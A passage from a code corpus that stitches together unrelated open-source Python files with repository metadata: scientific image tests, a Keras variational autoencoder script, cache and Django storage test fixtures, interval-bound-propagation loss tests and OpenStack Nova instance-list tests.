grid[100, 50] = 4
grid_small = image_util.re_size(grid, factor=2)
assert grid_small[50][25] == 1
grid_same = image_util.re_size(grid, factor=1)
npt.assert_equal(grid_same, grid)
def test_stack_images():
numPix = 10
image1 = np.ones((numPix, numPix))
image2 = np.ones((numPix, numPix)) / 10.
image_list = [image1, image2]
wht1 = np.ones((numPix, numPix))
wht2 = np.ones((numPix, numPix)) * 10
wht_list = [wht1, wht2]
sigma_list = [0.1, 0.2]
image_stacked, wht_stacked, sigma_stacked = image_util.stack_images(image_list=image_list, wht_list=wht_list, sigma_list=sigma_list)
assert sigma_stacked == 0.19306145983268458
assert image_stacked[0, 0] == 0.18181818181818182
assert wht_stacked[0, 0] == 5.5
def test_rebin_image():
numPix = 10
bin_size = 2
image = np.ones((numPix, numPix))
wht_map = np.ones((numPix, numPix)) * 10
idex_mask = np.ones((numPix, numPix))
sigma_bkg = 0.1
ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
ra_coords = util.array2image(ra_coords)
dec_coords = util.array2image(dec_coords)
image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized, dec_coords_resized, idex_mask_resized = image_util.rebin_image(bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
assert image_resized[0, 0] == 4
assert wht_map_resized[0, 0] == wht_map[0, 0]
assert sigma_bkg_resized == 0.2
assert ra_coords_resized[0, 0] == -0.2
numPix = 11
bin_size = 2
image = np.ones((numPix, numPix))
wht_map = np.ones((numPix, numPix)) * 10
idex_mask = np.ones((numPix, numPix))
sigma_bkg = 0.1
ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
ra_coords = util.array2image(ra_coords)
dec_coords = util.array2image(dec_coords)
image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized, dec_coords_resized, idex_mask_resized = image_util.rebin_image(
bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
assert image_resized[0, 0] == 4
assert wht_map_resized[0, 0] == wht_map[0, 0]
assert sigma_bkg_resized == 0.2
npt.assert_almost_equal(ra_coords_resized[0, 0], -0.225, decimal=8)
def test_radial_profile():
from lenstronomy.LightModel.Profiles.gaussian import Gaussian
gauss = Gaussian()
x, y = util.make_grid(11, 1)
flux = gauss.function(x, y, sigma=10, amp=1)
data = util.array2image(flux)
profile_r = image_util.radial_profile(data, center=[5, 5])
profile_r_true = gauss.function(np.linspace(0, stop=7, num=8), 0, sigma=10, amp=1)
npt.assert_almost_equal(profile_r, profile_r_true, decimal=3)
def test_gradient_map():
image = np.zeros((6, 8))
grad = image_util.gradient_map(image)
npt.assert_almost_equal(grad, image, decimal=6)
image_ones = np.ones((6, 8))
grad = image_util.gradient_map(image_ones)
npt.assert_almost_equal(grad, image, decimal=6)
assert np.shape(grad) == np.shape(image)
class TestRaise(unittest.TestCase):
def test_raise(self):
with self.assertRaises(ValueError):
grid2d = np.zeros((7, 7))
x_pos, y_pos = 4, 1
kernel = np.ones((2, 2))
added = image_util.add_layer2image_int(grid2d, x_pos, y_pos, kernel)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.re_size(image, factor=2)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.re_size(image, factor=0.5)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.cut_edges(image, numPix=7)
with self.assertRaises(ValueError):
image = np.ones((5, 6))
image_util.cut_edges(image, numPix=3)
with self.assertRaises(ValueError):
image = np.ones((5, 5))
image_util.cut_edges(image, numPix=2)
if __name__ == '__main__':
pytest.main()
|
sphinxext/suites.py
|
zmoon/scipy-lecture-notes
| 2,538 |
64481
|
def fib(n):
"return nth term of Fibonacci sequence"
a, b = 0, 1
i = 0
while i<n:
a, b = b, a+b
i += 1
return b
def linear_recurrence(n, (a,b)=(2,0), (u0, u1)=(1,1)):
"""return nth term of the sequence defined by the
linear recurrence
u(n+2) = a*u(n+1) + b*u(n)"""
i = 0
u, v = u0, u1
while i<n:
w = a*v + b*u
u, v = v, w
i +=1
return w
|
dataset_code/pred_proba_XGB.py
|
mapicccy/Stock-Market-Trend-Analysis-Using-HMM-LSTM
| 147 |
64492
|
import numpy as np
from public_tool.form_index import form_index
from XGB_HMM.form_B_matrix_by_XGB import form_B_matrix_by_XGB
from XGB_HMM.predict import self_pred
def pred_proba_XGB(A, model, pi, O, allow_flag, lengths):
# 对dataset形成pred_proba,注意这里的dataset是solve_on_raw_data后的结果,即附带allow_flag的数据
# output:
# pred_proba:数组类型
n_states = len(pi)
pred_proba = np.zeros((O.shape[0], n_states))
for i in range(len(lengths)):
begin_index, end_index = form_index(lengths, i)
now_O = O[begin_index:end_index, :]
now_allow_flag = allow_flag[begin_index:end_index]
now_pred_proba = np.zeros((now_O.shape[0], n_states))
now_allow_B = form_B_matrix_by_XGB(model, now_O[now_allow_flag == 1], pi)
_, now_allow_pred_proba, _ = self_pred(now_allow_B, [now_allow_B.shape[0]], A, pi)
now_pred_proba[now_allow_flag == 1] = now_allow_pred_proba
pred_proba[begin_index:end_index] = now_pred_proba
return pred_proba
|
tests/SampleApps/python/django-react-boilerplate/exampleapp/models.py
|
samruddhikhandale/Oryx
| 403 |
64506
|
from __future__ import unicode_literals
from django.db import models # noqa
# Create your models here.
|
src/test.py
|
chaitanya100100/VAE
| 115 |
64507
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
import cPickle
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras import optimizers
from full_params_conv_101 import *
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
x = Input(shape=original_img_size)
conv_1 = Conv2D(32,
kernel_size=(4, 4),
strides=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(64,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(128,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_2)
conv_4 = Conv2D(256,
kernel_size=(4, 4),
padding='same', activation='relu',
strides=(2, 2))(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(16384, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, 256, 8, 8)
else:
output_shape = (batch_size, 8, 8, 256)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(128,
kernel_size=(4, 4),
padding='same',
strides=(2, 2),
activation='relu')
decoder_deconv_2 = Conv2DTranspose(64,
kernel_size=(4, 4),
padding='same',
strides=(2, 2),
activation='relu')
decoder_deconv_3_upsamp = Conv2DTranspose(32,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
activation='relu')
decoder_mean_squash = Conv2DTranspose(3,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
activation='relu')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
sgd = optimizers.SGD(lr=0.01)
vae.compile(optimizer=sgd, loss=None)
vae.summary()
"""
with open('../datasets/101_ObjectCategories.pkl') as f:
dic = cPickle.load(f)
x_train = dic['all_images']
"""
x_train = np.load('../datasets/full_x.npy')
print "dataset loaded"
history = vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
)
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
"""
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
"""
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
vae.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_vae.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
encoder.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_encoder.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
generator.save('../models/object101_ld_%d_conv_%d_id_%d_e_%d_generator.h5' % (latent_dim, num_conv, intermediate_dim, epochs))
fname = '../models/object101_ld_%d_conv_%d_id_%d_e_%d_history.pkl' % (latent_dim, num_conv, intermediate_dim, epochs)
with open(fname, 'wb') as file_pi:
cPickle.dump(history.history, file_pi)
"""
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
"""
|
crabageprediction/venv/Lib/site-packages/pandas/io/formats/__init__.py
|
13rianlucero/CrabAgePrediction
| 28,899 |
64514
|
<gh_stars>1000+
from typing import TYPE_CHECKING
if TYPE_CHECKING:
# import modules that have public classes/functions
from pandas.io.formats import style
# and mark only those modules as public
__all__ = ["style"]
|
tests/ut/conftest.py
|
rspadim/aiocache
| 213 |
64524
|
<filename>tests/ut/conftest.py
import pytest
import asynctest
from aiocache.base import BaseCache, API
from aiocache import caches, RedisCache, MemcachedCache
from aiocache.plugins import BasePlugin
from aiocache.serializers import BaseSerializer
def pytest_configure():
"""
Before pytest_namespace was being used to set the keys for
testing but the feature was removed
https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace
"""
pytest.KEY = "key"
pytest.KEY_1 = "random"
@pytest.fixture(autouse=True)
def reset_caches():
caches.set_config(
{
"default": {
"cache": "aiocache.SimpleMemoryCache",
"serializer": {"class": "aiocache.serializers.NullSerializer"},
}
}
)
class MockCache(BaseCache):
def __init__(self):
super().__init__()
self._add = asynctest.CoroutineMock()
self._get = asynctest.CoroutineMock()
self._gets = asynctest.CoroutineMock()
self._set = asynctest.CoroutineMock()
self._multi_get = asynctest.CoroutineMock(return_value=["a", "b"])
self._multi_set = asynctest.CoroutineMock()
self._delete = asynctest.CoroutineMock()
self._exists = asynctest.CoroutineMock()
self._increment = asynctest.CoroutineMock()
self._expire = asynctest.CoroutineMock()
self._clear = asynctest.CoroutineMock()
self._raw = asynctest.CoroutineMock()
self._redlock_release = asynctest.CoroutineMock()
self.acquire_conn = asynctest.CoroutineMock()
self.release_conn = asynctest.CoroutineMock()
self._close = asynctest.CoroutineMock()
@pytest.fixture
def mock_cache(mocker):
cache = MockCache()
cache.timeout = 0.002
mocker.spy(cache, "_build_key")
for cmd in API.CMDS:
mocker.spy(cache, cmd.__name__)
mocker.spy(cache, "close")
cache.serializer = asynctest.Mock(spec=BaseSerializer)
cache.serializer.encoding = "utf-8"
cache.plugins = [asynctest.Mock(spec=BasePlugin)]
return cache
@pytest.fixture
def base_cache():
return BaseCache()
@pytest.fixture
def redis_cache():
cache = RedisCache()
return cache
@pytest.fixture
def memcached_cache():
cache = MemcachedCache()
return cache
|
tests/tests/test_storage.py
|
karlwnw/django-pipeline
| 598 |
64580
|
<filename>tests/tests/test_storage.py
from django.contrib.staticfiles import finders
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.management import call_command
from django.test import TestCase
from django.test.utils import override_settings
from django.test.utils import modify_settings
from pipeline.collector import default_collector
from pipeline.storage import PipelineStorage
from tests.tests.test_compiler import DummyCompiler
from tests.utils import pipeline_settings
from io import StringIO
class PipelineNoPathStorage(PipelineStorage):
"""Storage without an implemented path method"""
def path(self, *args):
raise NotImplementedError()
def delete(self, *args):
return
def exists(self, *args):
return True
def save(self, *args):
return
def open(self, *args):
return StringIO()
def listdir(self, *args):
return []
class DummyCSSCompiler(DummyCompiler):
""" Handles css files """
output_extension = 'css'
def match_file(self, path):
return path.endswith('.css')
class StorageTest(TestCase):
def tearDown(self):
staticfiles_storage._setup()
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None)
def test_post_process_dry_run(self):
default_collector.collect()
processed_files = PipelineStorage().post_process({}, True)
self.assertEqual(list(processed_files), [])
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None, COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
def test_post_process(self):
default_collector.collect()
storage = PipelineStorage()
processed_files = storage.post_process({})
self.assertTrue(('screen.css', 'screen.css', True) in processed_files)
self.assertTrue(('scripts.js', 'scripts.js', True) in processed_files)
@override_settings(STATICFILES_STORAGE='tests.tests.test_storage.PipelineNoPathStorage')
@pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None, COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
def test_post_process_no_path(self):
"""
Test post_process with a storage that doesn't implement the path method.
"""
staticfiles_storage._setup()
try:
call_command('collectstatic', verbosity=0, interactive=False)
except NotImplementedError:
self.fail('Received an error running collectstatic')
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.PipelineFinder'
})
def test_nonexistent_file_pipeline_finder(self):
path = finders.find('nothing.css')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.CachedFileFinder'
})
def test_nonexistent_file_cached_finder(self):
path = finders.find('nothing.css')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.PipelineFinder'
})
def test_nonexistent_double_extension_file_pipeline_finder(self):
path = finders.find('app.css.map')
self.assertIsNone(path)
@modify_settings(STATICFILES_FINDERS={
'append': 'pipeline.finders.CachedFileFinder'
})
def test_nonexistent_double_extension_file_cached_finder(self):
path = finders.find('app.css.map')
self.assertIsNone(path)
|
interval_bound_propagation/tests/loss_test.py
|
cknabs/interval-bound-propagation
| 140 |
64583
|
# coding=utf-8
# Copyright 2019 The Interval Bound Propagation Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for loss."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import interval_bound_propagation as ibp
import sonnet as snt
import tensorflow.compat.v1 as tf
class FixedNN(snt.AbstractModule):
def _build(self, z0, is_training=False):
self._m = snt.Linear(2, initializers={
'w': tf.constant_initializer(1.),
'b': lambda *unsed_args, **unused_kwargs: tf.constant([0., 1.]),
})
return self._m(z0)
class LossTest(tf.test.TestCase):
def testEndToEnd(self):
predictor = FixedNN()
predictor = ibp.VerifiableModelWrapper(predictor)
# Labels.
labels = tf.constant([1], dtype=tf.int64)
# Connect to input.
z = tf.constant([[1, 2, 3]], dtype=tf.float32)
predictor(z, is_training=True)
# Input bounds.
eps = 1.
input_bounds = ibp.IntervalBounds(z - eps, z + eps)
predictor.propagate_bounds(input_bounds)
# Create output specification (that forces the first logits to be greater).
c = tf.constant([[[1, -1]]], dtype=tf.float32)
d = tf.constant([[0]], dtype=tf.float32)
# Turn elision off for more interesting results.
spec = ibp.LinearSpecification(c, d, collapse=False)
# Create an attack.
attack = ibp.UntargetedPGDAttack(
predictor, spec, eps, num_steps=1, input_bounds=(-100., 100))
# Build loss.
losses = ibp.Losses(predictor, spec, attack,
interval_bounds_loss_type='hinge',
interval_bounds_hinge_margin=0.)
losses(labels)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
# We expect the worst-case logits from IBP to be [9, 4].
# The adversarial attack should fail since logits are always [l, l + 1].
# Similarly, the nominal predictions are correct.
accuracy_values, loss_values = sess.run(
[losses.scalar_metrics, losses.scalar_losses])
self.assertAlmostEqual(1., accuracy_values.nominal_accuracy)
self.assertAlmostEqual(0., accuracy_values.verified_accuracy)
self.assertAlmostEqual(1., accuracy_values.attack_accuracy)
expected_xent = 0.31326168751822947
self.assertAlmostEqual(expected_xent, loss_values.nominal_cross_entropy,
places=5)
self.assertAlmostEqual(expected_xent, loss_values.attack_cross_entropy,
places=5)
expected_hinge = 5.
self.assertAlmostEqual(expected_hinge, loss_values.verified_loss)
if __name__ == '__main__':
tf.test.main()
|
nova/tests/functional/compute/test_instance_list.py
|
zjzh/nova
| 1,874 |
64594
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo_utils.fixture import uuidsentinel as uuids
from nova.compute import instance_list
from nova import context
from nova.db.main import api as db
from nova import exception
from nova import objects
from nova import test
class InstanceListTestCase(test.TestCase):
NUMBER_OF_CELLS = 3
def setUp(self):
super(InstanceListTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.num_instances = 3
self.instances = []
start = datetime.datetime(1985, 10, 25, 1, 21, 0)
dt = start
spread = datetime.timedelta(minutes=10)
self.cells = objects.CellMappingList.get_all(self.context)
# Create three instances in each of the real cells. Leave the
# first cell empty to make sure we don't break with an empty
# one.
for cell in self.cells[1:]:
for i in range(0, self.num_instances):
with context.target_cell(self.context, cell) as cctx:
inst = objects.Instance(
context=cctx,
project_id=self.context.project_id,
user_id=self.context.user_id,
created_at=start,
launched_at=dt,
instance_type_id=i,
hostname='%s-inst%i' % (cell.name, i))
inst.create()
if i % 2 == 0:
# Make some faults for this instance
for n in range(0, i + 1):
msg = 'fault%i-%s' % (n, inst.hostname)
f = objects.InstanceFault(context=cctx,
instance_uuid=inst.uuid,
code=i,
message=msg,
details='fake',
host='fakehost')
f.create()
self.instances.append(inst)
im = objects.InstanceMapping(context=self.context,
project_id=inst.project_id,
user_id=inst.user_id,
instance_uuid=inst.uuid,
cell_mapping=cell)
im.create()
dt += spread
def test_get_sorted(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['asc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_descending(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['desc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(list(reversed(sorted(uuids))), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_with_filter(self):
filters = {'instance_type_id': 1}
limit = None
marker = None
columns = []
sort_keys = ['uuid']
sort_dirs = ['asc']
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = [inst['uuid'] for inst in insts]
expected = [inst['uuid'] for inst in self.instances
if inst['instance_type_id'] == 1]
self.assertEqual(list(sorted(expected)), uuids)
def test_get_sorted_by_defaults(self):
filters = {}
limit = None
marker = None
columns = []
sort_keys = None
sort_dirs = None
obj, insts = instance_list.get_instances_sorted(self.context, filters,
limit, marker, columns,
sort_keys, sort_dirs)
uuids = set([inst['uuid'] for inst in insts])
expected = set([inst['uuid'] for inst in self.instances])
self.assertEqual(expected, uuids)
def test_get_sorted_with_limit(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5, None,
[], ['uuid'], ['asc'])
uuids = [inst['uuid'] for inst in insts]
had_uuids = [inst.uuid for inst in self.instances]
self.assertEqual(sorted(had_uuids)[:5], uuids)
self.assertEqual(5, len(uuids))
def test_get_sorted_with_large_limit(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5000, None,
[], ['uuid'], ['asc'])
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def test_get_sorted_with_large_limit_batched(self):
obj, insts = instance_list.get_instances_sorted(self.context, {},
5000, None,
[], ['uuid'], ['asc'],
batch_size=2)
uuids = [inst['uuid'] for inst in insts]
self.assertEqual(sorted(uuids), uuids)
self.assertEqual(len(self.instances), len(uuids))
def _test_get_sorted_with_limit_marker(self, sort_by, pages=2, pagesize=2,
sort_dir='asc'):
"""Get multiple pages by a sort key and validate the results.
This requests $pages of $pagesize, followed by a final page with
no limit, and a final-final page which should be empty. It validates
that we got a consistent set of results no patter where the page
boundary is, that we got all the results after the unlimited query,
and that the final page comes back empty when we use the last
instance as a marker.
"""
insts = []
page = 0
while True:
if page >= pages:
# We've requested the specified number of limited (by pagesize)
# pages, so request a penultimate page with no limit which
# should always finish out the result.
limit = None
else:
# Request a limited-size page for the first $pages pages.
limit = pagesize
if insts:
# If we're not on the first page, use the last instance we
# received as the marker
marker = insts[-1]['uuid']
else:
# No marker for the first page
marker = None
batch = list(
instance_list.get_instances_sorted(self.context, {},
limit, marker,
[], [sort_by],
[sort_dir])[1])
if not batch:
# This should only happen when we've pulled the last empty
# page because we used the marker of the last instance. If
# we end up with a non-deterministic ordering, we'd loop
# forever.
break
insts.extend(batch)
page += 1
if page > len(self.instances) * 2:
# Do this sanity check in case we introduce (or find) another
# repeating page bug like #1721791. Without this we loop
# until timeout, which is less obvious.
raise Exception('Infinite paging loop')
# We should have requested exactly (or one more unlimited) pages
self.assertIn(page, (pages, pages + 1))
# Make sure the full set matches what we know to be true
found = [x[sort_by] for x in insts]
had = [x[sort_by] for x in self.instances]
if sort_by in ('launched_at', 'created_at'):
# We're comparing objects and database entries, so we need to
# squash the tzinfo of the object ones so we can compare
had = [x.replace(tzinfo=None) for x in had]
self.assertEqual(len(had), len(found))
if sort_dir == 'asc':
self.assertEqual(sorted(had), found)
else:
self.assertEqual(list(reversed(sorted(had))), found)
def test_get_sorted_with_limit_marker_stable(self):
"""Test sorted by hostname.
This will be a stable sort that won't change on each run.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname')
def test_get_sorted_with_limit_marker_stable_reverse(self):
"""Test sorted by hostname.
This will be a stable sort that won't change on each run.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
sort_dir='desc')
def test_get_sorted_with_limit_marker_stable_different_pages(self):
"""Test sorted by hostname with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
pages=3, pagesize=1)
def test_get_sorted_with_limit_marker_stable_different_pages_reverse(self):
"""Test sorted by hostname with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='hostname',
pages=3, pagesize=1,
sort_dir='desc')
def test_get_sorted_with_limit_marker_random(self):
"""Test sorted by uuid.
This will not be stable and the actual ordering will depend on
uuid generation and thus be different on each run. Do this in
addition to the stable sort above to keep us honest.
"""
self._test_get_sorted_with_limit_marker(sort_by='uuid')
def test_get_sorted_with_limit_marker_random_different_pages(self):
"""Test sorted by uuid with different page sizes.
Just do the above with page seams in different places.
"""
self._test_get_sorted_with_limit_marker(sort_by='uuid',
pages=3, pagesize=2)
def test_get_sorted_with_limit_marker_datetime(self):
"""Test sorted by launched_at.
This tests that we can do all of this, but with datetime
fields.
"""
self._test_get_sorted_with_limit_marker(sort_by='launched_at')
def test_get_sorted_with_limit_marker_datetime_same(self):
"""Test sorted by created_at.
This tests that we can do all of this, but with datetime
fields that are identical.
"""
self._test_get_sorted_with_limit_marker(sort_by='created_at')
def test_get_sorted_with_deleted_marker(self):
marker = self.instances[1]['uuid']
before = list(
instance_list.get_instances_sorted(self.context, {},
None, marker,
[], None, None)[1])
db.instance_destroy(self.context, marker)
after = list(
instance_list.get_instances_sorted(self.context, {},
None, marker,
[], None, None)[1])
self.assertEqual(before, after)
def test_get_sorted_with_invalid_marker(self):
self.assertRaises(exception.MarkerNotFound,
list, instance_list.get_instances_sorted(
self.context, {}, None, 'not-a-marker',
[], None, None)[1])
def test_get_sorted_with_purged_instance(self):
"""Test that we handle a mapped but purged instance."""
im = objects.InstanceMapping(self.context,
instance_uuid=uuids.missing,
project_id=self.context.project_id,
user_id=self.context.user_id,
cell=self.cells[0])
im.create()
self.assertRaises(exception.MarkerNotFound,
list, instance_list.get_instances_sorted(
self.context, {}, None, uuids.missing,
[], None, None)[1])
def _test_get_paginated_with_filter(self, filters):
found_uuids = []
marker = None
while True:
# Query for those instances, sorted by a different key in
# pages of one until we've consumed them all
batch = list(
instance_list.get_instances_sorted(self.context,
filters,
1, marker, [],
['hostname'],
['asc'])[1])
if not batch:
break
found_uuids.extend([x['uuid'] for x in batch])
marker = found_uuids[-1]
return found_uuids
def test_get_paginated_with_uuid_filter(self):
"""Test getting pages with uuid filters.
This runs through the results of a uuid-filtered query in pages of
length one to ensure that we land on markers that are filtered out
of the query and are not accidentally returned.
"""
# Pick a set of the instances by uuid, when sorted by uuid
all_uuids = [x['uuid'] for x in self.instances]
filters = {'uuid': sorted(all_uuids)[:7]}
found_uuids = self._test_get_paginated_with_filter(filters)
# Make sure we found all (and only) the instances we asked for
self.assertEqual(set(found_uuids), set(filters['uuid']))
self.assertEqual(7, len(found_uuids))
def test_get_paginated_with_other_filter(self):
"""Test getting pages with another filter.
This runs through the results of a filtered query in pages of
length one to ensure we land on markers that are filtered out
of the query and are not accidentally returned.
"""
expected = [inst['uuid'] for inst in self.instances
if inst['instance_type_id'] == 1]
filters = {'instance_type_id': 1}
found_uuids = self._test_get_paginated_with_filter(filters)
self.assertEqual(set(expected), set(found_uuids))
def test_get_paginated_with_uuid_and_other_filter(self):
"""Test getting pages with a uuid and other type of filter.
We do this to make sure that we still find (but exclude) the
marker even if one of the other filters would have included
it.
"""
# Pick a set of the instances by uuid, when sorted by uuid
all_uuids = [x['uuid'] for x in self.instances]
filters = {'uuid': sorted(all_uuids)[:7],
'user_id': 'fake'}
found_uuids = self._test_get_paginated_with_filter(filters)
# Make sure we found all (and only) the instances we asked for
self.assertEqual(set(found_uuids), set(filters['uuid']))
self.assertEqual(7, len(found_uuids))
def test_get_sorted_with_faults(self):
"""Make sure we get faults when we ask for them."""
insts = list(
instance_list.get_instances_sorted(self.context, {},
None, None,
['fault'],
['hostname'], ['asc'])[1])
# Two of the instances in each cell have faults (0th and 2nd)
expected_faults = self.NUMBER_OF_CELLS * 2
expected_no_fault = len(self.instances) - expected_faults
faults = [inst['fault'] for inst in insts]
self.assertEqual(expected_no_fault, faults.count(None))
def test_get_sorted_paginated_with_faults(self):
"""Get pages of one with faults.
Do this specifically so we make sure we land on faulted marker
instances to ensure we don't omit theirs.
"""
insts = []
while True:
if insts:
marker = insts[-1]['uuid']
else:
marker = None
batch = list(
instance_list.get_instances_sorted(self.context, {},
1, marker,
['fault'],
['hostname'], ['asc'])[1])
if not batch:
break
insts.extend(batch)
self.assertEqual(len(self.instances), len(insts))
# Two of the instances in each cell have faults (0th and 2nd)
expected_faults = self.NUMBER_OF_CELLS * 2
expected_no_fault = len(self.instances) - expected_faults
faults = [inst['fault'] for inst in insts]
self.assertEqual(expected_no_fault, faults.count(None))
def test_instance_list_minimal_cells(self):
